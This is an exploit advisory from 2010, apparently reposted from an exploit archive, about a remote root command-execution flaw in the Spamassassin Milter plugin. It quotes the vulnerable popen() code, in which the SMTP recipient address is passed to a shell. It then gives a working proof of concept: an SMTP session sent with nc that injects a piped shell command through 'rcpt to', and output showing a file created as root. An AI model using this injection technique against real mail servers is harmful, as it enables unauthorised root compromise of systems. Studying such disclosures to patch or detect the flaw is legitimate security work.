Apache Spamassassin Milter Plugin Remote Root Command Execution

snake_l

Description: The Spamassassin Milter plugin suffers from a remote root command execution vulnerability. Full exploit details provided.

Author: Kingcope

Spamassassin Milter Plugin Remote Root Zeroday (BTW zerodays lurk in the

shadows not HERE)

aka the postfix_joker advisory

Logic fuckup?

March 07 2010 // if you read this 10 years later you are definetly

seeking the nice 0days!

Greetz fly out to alex,andi,adize :D

+++ KEEP IT ULTRA PRIV8 +++

Software

+-+-+-+-+

Apache Spamassassin

SpamAssassin is a mail filter which attempts to identify spam using

a variety of mechanisms including text analysis, Bayesian filtering,

DNS blocklists, and collaborative filtering databases.

SpamAssassin is a project of the Apache Software Foundation (ASF).

Postfix

What is Postfix? It is Wietse Venema's mailer that started life at IBM

research as an alternative to the widely-used Sendmail program.

Postfix attempts to be fast, easy to administer, and secure.

The outside has a definite Sendmail-ish flavor, but the inside is

completely different.

Spamassassin Milter

A little plugin for the Sendmail Milter (Mail Filter) library

that pipes all incoming mail (including things received by rmail/UUCP)

through the SpamAssassin, a highly customizable SpamFilter.

Remote Code Execution Vulnerability

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The Spamassassin Milter Plugin can be tricked into executing any command

as the root user remotely.

If spamass-milter is run with the expand flag (-x option) it runs a

popen() including the attacker supplied

recipient (RCPT TO).

>From spamass-milter-0.3.1 (-latest) Line 820:

//

// Gets called once for each recipient

//

// stores the first recipient in the spamassassin object and

// stores all addresses and the number thereof (some redundancy)

//

sfsistat

mlfi_envrcpt(SMFICTX* ctx, char** envrcpt)

{

struct context *sctx = (struct context*)smfi_getpriv(ctx);

SpamAssassin* assassin = sctx->assassin;

FILE *p;

#if defined(__FreeBSD__)

int rv;

#endif

debug(D_FUNC, "mlfi_envrcpt: enter");

if (flag_expand)

{

/* open a pipe to sendmail so we can do address

expansion */

char buf[1024];

char *fmt="%s -bv /"%s/" 2>&1";

#if defined(HAVE_SNPRINTF)

snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL, envrcpt[0]);

#else

/* XXX possible buffer overflow here // is this a

joke ?! */

sprintf(buf, fmt, SENDMAIL, envrcpt[0]);

#endif

debug(D_RCPT, "calling %s", buf);

#if defined(__FreeBSD__) /* popen bug - see PR bin/50770 */

rv = pthread_mutex_lock(&popen_mutex);

if (rv)

{

debug(D_ALWAYS, "Could not lock popen mutex: %

s", strerror(rv));

abort();

}

#endif

p = popen(buf, "r"); [1]

if (!p)

{

debug(D_RCPT, "popen failed(%s). Will not

expand aliases", strerror(errno));

assassin->expandedrcpt.push_back(envrcpt[0]);

[1] the vulnerable popen() call.

Remote Root Exploit PoC through postfix

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

$ nc localhost 25

220 ownthabox ESMTP Postfix (Ubuntu)

mail from: me@me.com

250 2.1.0 Ok

rcpt to: root+:"|touch /tmp/foo"

250 2.1.5 Ok

$ ls -la /tmp/foo

-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo

Signed,

Kingcope